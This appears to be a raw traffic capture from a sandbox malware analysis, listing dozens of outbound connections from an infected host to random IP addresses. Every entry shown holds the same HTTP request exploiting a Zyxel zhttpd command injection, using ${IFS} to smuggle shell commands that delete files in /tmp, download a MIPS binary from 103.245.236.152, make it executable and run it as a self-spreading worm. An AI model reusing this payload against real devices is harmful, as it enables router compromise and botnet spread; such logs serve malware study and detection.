                                            Jan 14, 2024 15:50:57.802751064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9129192.168.2.2333544136.142.129.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802810907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9130192.168.2.2351354223.254.233.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802839994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9131192.168.2.2348934186.223.242.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802860022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9132192.168.2.234535046.203.221.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802917957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9133192.168.2.234212252.187.183.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802926064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9134192.168.2.235500027.122.205.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802987099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9135192.168.2.233362657.242.162.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803042889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9136192.168.2.2339626128.166.123.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803082943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9137192.168.2.233717869.159.40.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803107023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9138192.168.2.2351486136.19.41.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803133011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9139192.168.2.234808465.75.158.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803217888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9140192.168.2.2343370178.239.56.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803251028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9141192.168.2.2357390140.156.180.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803302050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9142192.168.2.2348900158.179.96.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803324938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9143192.168.2.2347034208.166.62.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803373098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9144192.168.2.2344706179.211.69.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803420067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9145192.168.2.2359224154.102.255.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803437948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9146192.168.2.2356720138.81.102.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803514004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9147192.168.2.2335682159.70.242.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803536892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9148192.168.2.2350796207.122.94.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803597927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9149192.168.2.235432831.40.146.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803651094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9150192.168.2.233454269.246.162.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803689957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9151192.168.2.2340576132.103.186.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803745031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9152192.168.2.2359620101.233.224.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803785086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9153192.168.2.2348186208.157.108.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803813934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9154192.168.2.2356206139.27.224.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803847075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9155192.168.2.2344170105.54.58.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803894997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9156192.168.2.2355340190.200.213.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803947926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9157192.168.2.2353924124.102.35.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.803971052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9158192.168.2.23550965.150.6.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804006100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9159192.168.2.2342568175.189.237.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804055929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9160192.168.2.2347880172.235.42.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804099083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9161192.168.2.2354338159.108.80.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804137945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9162192.168.2.2341226138.217.40.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804167986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9163192.168.2.2353884200.196.181.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804229975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9164192.168.2.235119893.182.223.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804261923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9165192.168.2.235739869.170.63.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804306030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9166192.168.2.235111246.244.149.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804359913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9167192.168.2.235136886.226.142.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804423094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9168192.168.2.23473402.193.19.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804442883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9169192.168.2.235152286.149.38.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804488897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9170192.168.2.235596836.206.40.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804538012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9171192.168.2.2334516152.92.37.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804553032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9172192.168.2.2338908189.103.228.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804622889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9173192.168.2.234619823.28.233.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804651022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9174192.168.2.236059614.56.55.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804681063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9175192.168.2.2354146222.0.2.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804725885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9176192.168.2.2358762132.49.201.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804769993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9177192.168.2.2348430198.113.201.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804811954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9178192.168.2.2356116134.33.5.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804868937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9179192.168.2.235491461.37.83.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804898977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9180192.168.2.233577846.68.139.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804933071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9181192.168.2.235897820.12.97.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804964066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9182192.168.2.234905240.107.76.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.804996967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9183192.168.2.2346636120.206.224.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805056095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9184192.168.2.234222032.228.150.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805105925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9185192.168.2.23380902.163.152.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805154085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9186192.168.2.2349216202.113.182.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805205107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9187192.168.2.2355408101.116.25.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805233955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9188192.168.2.2346112115.119.247.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805286884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9189192.168.2.2333836108.195.102.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805325031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9190192.168.2.233637263.53.142.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.805354118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9191192.168.2.2339208189.166.38.171443
                                            TimestampBytes transferredDirectionData
